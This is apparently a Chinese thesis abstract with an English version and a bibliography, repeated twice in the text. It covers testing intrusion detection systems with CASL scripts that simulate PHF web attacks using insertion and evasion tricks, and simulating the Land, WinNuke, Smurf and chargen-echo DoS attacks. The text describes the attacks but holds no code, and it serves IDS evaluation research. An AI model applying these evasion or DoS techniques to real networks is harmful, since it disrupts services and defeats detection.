基于CASL的入侵检测系统测试及拒绝服务攻击模拟
摘要
随着互联网的迅速扩展,计算机安全事件每年也以惊人的数量增长,网络安全日益受到人们的关注。作为计算机安全中不可缺少的组成部分,入侵检测系统(IDS)已经受到广泛的应用,对其进行测试和评价的要求也越来越迫切。开发者希望通过测试和评价发现产品中的不足,用户希望通过测试和评价来帮助自己选择合适的入侵检测产品。
目前,国内在入侵检测系统测试方面的研究还很少,我们开展了一些初步的研究工作:使用CASL语言编写测试程序,选取当前有代表性的入侵检测系统进行入侵识别测试,验证入侵检测系统在典型网络环境下的功能特性。通过分析测试结果,对当前的入侵检测技术进行评价。除此以外,我们还深入研究了拒绝服务(DoS)攻击的攻击机制,使用CASL语言模拟了四种典型的拒绝服务攻击。
以上工作的顺利进行,是因为使用了一个高效的安全工具——自定义审计脚本语言(CASL:Custom Audit Scripting Language)。CASL语言是一种高级编程语言,它提供了各种数据包模板和完备的网络编程功能,可以方便地编写模拟底层攻击或对网络进行信息收集检查的程序。CASL语言在语法上与C语言很相似,掌握起来并不难。同时,它也具有脚本语言的特点,编写的程序通过解释方式执行,不会消耗大量的内存和CPU资源。
我们编写了二十五个模拟“PHF”Web服务器攻击的测试程序。之所以模拟PHF攻击是因为所有被测试的IDS都能检测出这种攻击,并且模拟起来比较简单,攻击特征为字符串“GET /cgi-bin/phf?”。另外,被攻击主机上已经不存在相应的安全漏洞,不会受到真正的损害。这些测试程序采用典型的“插入式”和“逃避式”方法来干扰IDS,以便验证入侵检测系统的功能特性。
所有的测试在一个10M以太网环境中进行,该局域网通过路由器连入Internet。测试时需要使用三台主机:运行测试程序的主机,被攻击主机和监控主机。在被攻击主机上先后安装﹑配置有代表性的入侵检测系统,并打开受攻击端口——80。监控主机用于记录攻击时的网络流量,以便日后进行回放分析。然后依次运行所有测试程序,记录入侵检测系统的输出,得到测试结果。
我们的测试结果表明:依靠被动的协议分析进行数据收集的入侵检测系统存在固有缺陷,攻击者可以采用各种欺骗﹑干扰手段逃避入侵检测系统的检测。开发商出于各方面的原因,往往会夸大入侵检测系统的作用。新的技术(如入侵预防)可能是未来的解决方法。
自从拒绝服务(DoS)攻击出现以后,每年都造成巨大的经济损失。随着各种自
动化拒绝服务攻击工具的出现,DoS攻击对网络安全的威胁日益严重。当前,关于拒绝服务攻击的研究工作主要集中于攻击检测和响应机制上,而对于DoS攻击本身的具体细节方面的工作并不多。我们搜集了大量的相关信息,深入研究了拒绝服务(DoS)攻击的攻击机制,使用CASL语言模拟了四种典型的拒绝服务攻击——Land,WinNuke,Smurf和Chargen-Echo循环攻击。其中前两种属于资源匮乏型拒绝服务攻击,后两种属于带宽消耗型拒绝服务攻击。
时至今日,拒绝服务攻击的问题没有太大的变化。各种资源(如带宽,内存等)总是有限的,容易遭受“消耗型”攻击。互联网上仍然存在着大量不安全的(不坚固的)系统可以被攻击者利用发起拒绝服务攻击。我们编写的模拟拒绝服务攻击的程序,将有助于研究人员更深刻地理解拒绝服务攻击的本质,发现更有效的方法防范拒绝服务攻击。
With the rapid development of Internet, there have been an increasing number of computer security incidents every year. More attention has been paid on network security. As an indispensable instrument of computer security, intrusion detection systems (IDS) have been applied broadly. There is an urgent need to test and evaluate IDSs. Developers hope to find flaws by testing and evaluating IDSs, and consumers expect that testing and evaluating IDSs will contribute to select proper products.
At present, limited progress has been made in testing IDSs, and we have made some preliminary efforts. We wrote test programs by Custom Audit Scripting Language to simulate real network attacks (intrusions). Intrusion signature identification tests were performed upon currently typical intrusion detection systems to validate their functional characteristics under representative network environment. A summary evaluation on general intrusion detection technique is presented after analyzing the test results. Meanwhile, we took a deep research in the methodology of Denial-of-Service (DoS) attacks, and simulated four typical DoS attacks in CASL.
We can go on further research due to Custom Audit Scripting Language (CASL), a powerful security tool. CASL is a high-level programming language that provides various packet templates and powerful network programming functionality, and can be easily used to write programs that simulate low-level attacks or information gathering checks on networks. CASL is similar to C in syntax, and easy to learn and used as shell-script languages. CASL programs are executed through interpretation and don't consume the large amounts of memory and CPU
Twenty-five test programs were written to simulate “PHF” WEB server attack. The reason why we choose this attack lies in: all IDSs can detect it and it is easy to simulate with the attack signature of a specific string (“GET /cgi-bin/-phf?”). What’s more, the victim host will not be compromised because there are no security vulnerabilities on it. Insertion and evasion attack methods used to disturb IDSs are exploited by these test programs in order to validate the functionality of IDSs.
All tests are conducted in a 10BaseT Ethernet, which connects the Internet through a router. The hosts we need include the test host, the victim host and the monitor host. All IDSs are installed and configured on the victim host in turn and port 80 is opened as the victim port. The monitor host is to log network traffic, which can be used to replay later.
Then we execute all test programs, record the output of IDSs and get the test results.
Our test results indicate: all intrusion detection systems that rely upon passive protocol analysis to collect data are fundamentally flawed. Attackers may exploit various methods to deceive and confuse IDSs and evade detection by IDSs. Vendors make many exaggerated claims for their products due to various reasons. New technique (as intrusion prevention) may be an optional approach in future.
Since the first denial of Service (DoS) attack appears, DoS attacks cause significant financial damage every year. With the development of automated DoS attack tools; DoS attacks make a greater threat against network security. At present, the majority researchers focus on attack detection and respond mechanism, yet limited progress has been made in the details of DoS attacks. We collect large amount of related information, and take a deep research in the methodology of DoS attacks. Four typical DoS attacks, including Land, WinNuke, Smurf and chargen-echo loop, are simulated in CASL. Land and WinNuke belong to resource starvation DoS attacks, and Smurf as well as chargen-echo loop belong to bandwidth consumption DoS attacks.
The problem of DoS attacks hasn’t significantly changed in recent years. Resources (as bandwidth and memory) remain limited and susceptible to consumption attacks. There are still great deals of weak or improperly secured systems that attackers can use to launch DoS attacks. The programs that simulate DoS attacks by us
目前,国内在入侵检测系统测试方面的研究还很少,我们开展了一些初步的研究工作:使用CASL语言编写测试程序,选取当前有代表性的入侵检测系统进行入侵识别测试,验证入侵检测系统在典型网络环境下的功能特性。通过分析测试结果,对当前的入侵检测技术进行评价。除此以外,我们还深入研究了拒绝服务(DoS)攻击的攻击机制,使用CASL语言模拟了四种典型的拒绝服务攻击。
以上工作的顺利进行,是因为使用了一个高效的安全工具——自定义审计脚本语言(CASL:Custom Audit Scripting Language)。CASL语言是一种高级编程语言,它提供了各种数据包模板和完备的网络编程功能,可以方便地编写模拟底层攻击或对网络进行信息收集检查的程序。CASL语言在语法上与C语言很相似,掌握起来并不难。同时,它也具有脚本语言的特点,编写的程序通过解释方式执行,不会消耗大量的内存和CPU资源。
我们编写了二十五个模拟“PHF”Web服务器攻击的测试程序。之所以模拟PHF攻击是因为所有被测试的IDS都能检测出这种攻击,并且模拟起来比较简单,攻击特征为字符串“GET /cgi-bin/phf?”。另外,被攻击主机上已经不存在相应的安全漏洞,不会受到真正的损害。这些测试程序采用典型的“插入式”和“逃避式”方法来干扰IDS,以便验证入侵检测系统的功能特性。
所有的测试在一个10M以太网环境中进行,该局域网通过路由器连入Internet。测试时需要使用三台主机:运行测试程序的主机,被攻击主机和监控主机。在被攻击主机上先后安装﹑配置有代表性的入侵检测系统,并打开受攻击端口——80。监控主机用于记录攻击时的网络流量,以便日后进行回放分析。然后依次运行所有测试程序,记录入侵检测系统的输出,得到测试结果。
我们的测试结果表明:依靠被动的协议分析进行数据收集的入侵检测系统存在固有缺陷,攻击者可以采用各种欺骗﹑干扰手段逃避入侵检测系统的检测。开发商出于各方面的原因,往往会夸大入侵检测系统的作用。新的技术(如入侵预防)可能是未来的解决方法。
自从拒绝服务(DoS)攻击出现以后,每年都造成巨大的经济损失。随着各种自
动化拒绝服务攻击工具的出现,DoS攻击对网络安全的威胁日益严重。当前,关于拒绝服务攻击的研究工作主要集中于攻击检测和响应机制上,而对于DoS攻击本身的具体细节方面的工作并不多。我们搜集了大量的相关信息,深入研究了拒绝服务(DoS)攻击的攻击机制,使用CASL语言模拟了四种典型的拒绝服务攻击——Land,WinNuke,Smurf和Chargen-Echo循环攻击。其中前两种属于资源匮乏型拒绝服务攻击,后两种属于带宽消耗型拒绝服务攻击。
时至今日,拒绝服务攻击的问题没有太大的变化。各种资源(如带宽,内存等)总是有限的,容易遭受“消耗型”攻击。互联网上仍然存在着大量不安全的(不坚固的)系统可以被攻击者利用发起拒绝服务攻击。我们编写的模拟拒绝服务攻击的程序,将有助于研究人员更深刻地理解拒绝服务攻击的本质,发现更有效的方法防范拒绝服务攻击。
With the rapid development of Internet, there have been an increasing number of computer security incidents every year. More attention has been paid on network security. As an indispensable instrument of computer security, intrusion detection systems (IDS) have been applied broadly. There is an urgent need to test and evaluate IDSs. Developers hope to find flaws by testing and evaluating IDSs, and consumers expect that testing and evaluating IDSs will contribute to select proper products.
At present, limited progress has been made in testing IDSs, and we have made some preliminary efforts. We wrote test programs by Custom Audit Scripting Language to simulate real network attacks (intrusions). Intrusion signature identification tests were performed upon currently typical intrusion detection systems to validate their functional characteristics under representative network environment. A summary evaluation on general intrusion detection technique is presented after analyzing the test results. Meanwhile, we took a deep research in the methodology of Denial-of-Service (DoS) attacks, and simulated four typical DoS attacks in CASL.
We can go on further research due to Custom Audit Scripting Language (CASL), a powerful security tool. CASL is a high-level programming language that provides various packet templates and powerful network programming functionality, and can be easily used to write programs that simulate low-level attacks or information gathering checks on networks. CASL is similar to C in syntax, and easy to learn and used as shell-script languages. CASL programs are executed through interpretation and don't consume the large amounts of memory and CPU
Twenty-five test programs were written to simulate “PHF” WEB server attack. The reason why we choose this attack lies in: all IDSs can detect it and it is easy to simulate with the attack signature of a specific string (“GET /cgi-bin/-phf?”). What’s more, the victim host will not be compromised because there are no security vulnerabilities on it. Insertion and evasion attack methods used to disturb IDSs are exploited by these test programs in order to validate the functionality of IDSs.
All tests are conducted in a 10BaseT Ethernet, which connects the Internet through a router. The hosts we need include the test host, the victim host and the monitor host. All IDSs are installed and configured on the victim host in turn and port 80 is opened as the victim port. The monitor host is to log network traffic, which can be used to replay later.
Then we execute all test programs, record the output of IDSs and get the test results.
Our test results indicate: all intrusion detection systems that rely upon passive protocol analysis to collect data are fundamentally flawed. Attackers may exploit various methods to deceive and confuse IDSs and evade detection by IDSs. Vendors make many exaggerated claims for their products due to various reasons. New technique (as intrusion prevention) may be an optional approach in future.
Since the first denial of Service (DoS) attack appears, DoS attacks cause significant financial damage every year. With the development of automated DoS attack tools; DoS attacks make a greater threat against network security. At present, the majority researchers focus on attack detection and respond mechanism, yet limited progress has been made in the details of DoS attacks. We collect large amount of related information, and take a deep research in the methodology of DoS attacks. Four typical DoS attacks, including Land, WinNuke, Smurf and chargen-echo loop, are simulated in CASL. Land and WinNuke belong to resource starvation DoS attacks, and Smurf as well as chargen-echo loop belong to bandwidth consumption DoS attacks.
The problem of DoS attacks hasn’t significantly changed in recent years. Resources (as bandwidth and memory) remain limited and susceptible to consumption attacks. There are still great deals of weak or improperly secured systems that attackers can use to launch DoS attacks. The programs that simulate DoS attacks by us
引文
Briny, Andy & Rose, Barbara Study Confirms Increased Security Risks of E-Commerce [online] /mag_survey.shtml>
胡亮, 康健, 赵阔 《入侵检测系统》 吉林大学学报[信息科学版] 第20卷 第4期, 2002年11月。
Anderson, James P. Computer Security Threat Monitoring and Surveillance. Fort Washington, PA: James P. Anderson Co., 1980.
Mukherjee B, Levitt T L. Network Intrusion Detection [J]. IEEE Network, 1984, 3 (3):26-41.
Ptacek, Thomas H. & Newsham, Timothy N. (Secure Networks, Inc.) Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection. January 1998.
Maxion, Roy A. (Carnegie Mellon University). Harbinger: Anomaly Detection Techniques. June 1999.
Julia Allen, Alan Christie, William Fithen, John McHugh, Jed Pickel, Ed Stoner: State of the Practice of Intrusion Detection Technologies. SEI Technical Report, CMU/SEI-99-TR-028. January 2000.
Spafford E, Zamboni D. Data Collection Mechanisms for Intrusion Detection Systems [R]. CERIAS Technical Report, Purdue University, IN47907-1315, 2000.
Puketza, Nicholas J., et al. (University of California, Davis). “A Methodology for Testing Intrusion Detection Systems.” IEEE Transactio-
ns on Software Engineering, Vol. 22, #10 (SE-22), October 1996.
Debar, H., et al. (IBM Zurich). An Experimentation Workbench for Intrusion Detection Systems (RZ2998). Zurich, Switzerland: IBM Research Division, March 1998
Stocksdale, Gregory. (National Security Agency). NSA Glossary of Terms in Security and Intrusion Detection. August 1999.
Durst, Robert, et al. Testing and Evaluating Computer Intrusion Detection Systems. Communications of the ACM 42, 7 July 1999.
Stocksdale, Gregory. (National Security Agency). SANS/NSA Intrusion
Detection Tools Inventory. July 1998.
Computer Security Institute. Tough Questions for IDS Vendors [online]. Available WWW: 1998.
Power, Richard. “CSI Round Table: Experts Discuss Present and Future Directions for ID Systems.” Computer Security Journal XIV, 1 [online]. Available WWW: 1999.
Snort. http://www.snort.org/
Examining port scan methods - Analysing Audible Techniques. whitepaper by dethy@synnergy.net. January 2001.
Denning D E. An Intrusion-Detection Model [J]. IEEE Transaction on Software Engineering, 1987.
BlackICE. http://blackice.iss.net/index.php
Computer Assoicates. http://www3.ca.com/Solutions/Product.asp?ID=163
Internet Security Systems (ISS). http://www.iss.net/
Andrew S. Tanenbaum. Computer Networks 3rd Ed. Prentice-Hall International, Inc. 1999.
Richard W. Stevens, TCP/IP Illustrated, Volume 1: The Protocols: Addison-Wesley Professional Computing Series, 1996.
CERT Coordination Center, “Denial of Service Attacks" http://www.cert-
.org/tech_tips/denial_of_service.html Feb 12, 1999
Alefiya Hussain. John Heidemann. Christos Papadopoulos. A Framework for Classifying Denial of Service Attacks. USC/Information Sciences Institute. 2003.
George Kurtz, Stuart McClure, and Joel Scambray. Hacking Exposed. McGraw-Hill, Berkeley, CA. 1999.
Stephen Northcutt, Mark Cooper, Matt Fearnow, Karen Frederick. Intrusion Signatures and Analysis. New Riders reserved. September 2002.
David Dittirch. DDoS Attacks and Tools.
CERT? Advisory CA-1999-17 Denial-of-Service Tools. http://www.cert.org-
/advisories/CA-1999-17.html. December 1999.
David. Dittrich The “stacheldraht” distributed denial of service attack tool. University of Washington. 1999.
Val Pipenko. Analyzing Distributed Denial of Service Attacks. SANS. 2002
CERT? Advisory CA-1998-01 Smurf IP Denial of Service-Attacks. http://www.cert.org/advisories/CA-1998-01.html. January 1998.
Kristopher Kendall. A Database of Computer Attacks for the Evaluation of Intrusion Detection Systems. MIT Lincoln Laboratory. May 1999.
S. Durst, T. Champion. Packet Address Swapping for Network Simulation. Patent application, Air Force Research Laboratory. March 1999.
胡亮, 康健, 赵阔 《入侵检测系统》 吉林大学学报[信息科学版] 第20卷 第4期, 2002年11月。
Anderson, James P. Computer Security Threat Monitoring and Surveillance. Fort Washington, PA: James P. Anderson Co., 1980.
Mukherjee B, Levitt T L. Network Intrusion Detection [J]. IEEE Network, 1984, 3 (3):26-41.
Ptacek, Thomas H. & Newsham, Timothy N. (Secure Networks, Inc.) Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection. January 1998.
Maxion, Roy A. (Carnegie Mellon University). Harbinger: Anomaly Detection Techniques. June 1999.
Julia Allen, Alan Christie, William Fithen, John McHugh, Jed Pickel, Ed Stoner: State of the Practice of Intrusion Detection Technologies. SEI Technical Report, CMU/SEI-99-TR-028. January 2000.
Spafford E, Zamboni D. Data Collection Mechanisms for Intrusion Detection Systems [R]. CERIAS Technical Report, Purdue University, IN47907-1315, 2000.
Puketza, Nicholas J., et al. (University of California, Davis). “A Methodology for Testing Intrusion Detection Systems.” IEEE Transactio-
ns on Software Engineering, Vol. 22, #10 (SE-22), October 1996.
Debar, H., et al. (IBM Zurich). An Experimentation Workbench for Intrusion Detection Systems (RZ2998). Zurich, Switzerland: IBM Research Division, March 1998
Stocksdale, Gregory. (National Security Agency). NSA Glossary of Terms in Security and Intrusion Detection. August 1999.
Durst, Robert, et al. Testing and Evaluating Computer Intrusion Detection Systems. Communications of the ACM 42, 7 July 1999.
Stocksdale, Gregory. (National Security Agency). SANS/NSA Intrusion
Detection Tools Inventory. July 1998.
Computer Security Institute. Tough Questions for IDS Vendors [online]. Available WWW:
Power, Richard. “CSI Round Table: Experts Discuss Present and Future Directions for ID Systems.” Computer Security Journal XIV, 1 [online]. Available WWW:
Snort. http://www.snort.org/
Examining port scan methods - Analysing Audible Techniques. whitepaper by dethy@synnergy.net. January 2001.
Denning D E. An Intrusion-Detection Model [J]. IEEE Transaction on Software Engineering, 1987.
BlackICE. http://blackice.iss.net/index.php
Computer Assoicates. http://www3.ca.com/Solutions/Product.asp?ID=163
Internet Security Systems (ISS). http://www.iss.net/
Andrew S. Tanenbaum. Computer Networks 3rd Ed. Prentice-Hall International, Inc. 1999.
Richard W. Stevens, TCP/IP Illustrated, Volume 1: The Protocols: Addison-Wesley Professional Computing Series, 1996.
CERT Coordination Center, “Denial of Service Attacks" http://www.cert-
.org/tech_tips/denial_of_service.html Feb 12, 1999
Alefiya Hussain. John Heidemann. Christos Papadopoulos. A Framework for Classifying Denial of Service Attacks. USC/Information Sciences Institute. 2003.
George Kurtz, Stuart McClure, and Joel Scambray. Hacking Exposed. McGraw-Hill, Berkeley, CA. 1999.
Stephen Northcutt, Mark Cooper, Matt Fearnow, Karen Frederick. Intrusion Signatures and Analysis. New Riders reserved. September 2002.
David Dittirch. DDoS Attacks and Tools.
CERT? Advisory CA-1999-17 Denial-of-Service Tools. http://www.cert.org-
/advisories/CA-1999-17.html. December 1999.
David. Dittrich The “stacheldraht” distributed denial of service attack tool. University of Washington. 1999.
Val Pipenko. Analyzing Distributed Denial of Service Attacks. SANS. 2002
CERT? Advisory CA-1998-01 Smurf IP Denial of Service-Attacks. http://www.cert.org/advisories/CA-1998-01.html. January 1998.
Kristopher Kendall. A Database of Computer Attacks for the Evaluation of Intrusion Detection Systems. MIT Lincoln Laboratory. May 1999.
S. Durst, T. Champion. Packet Address Swapping for Network Simulation. Patent application, Air Force Research Laboratory. March 1999.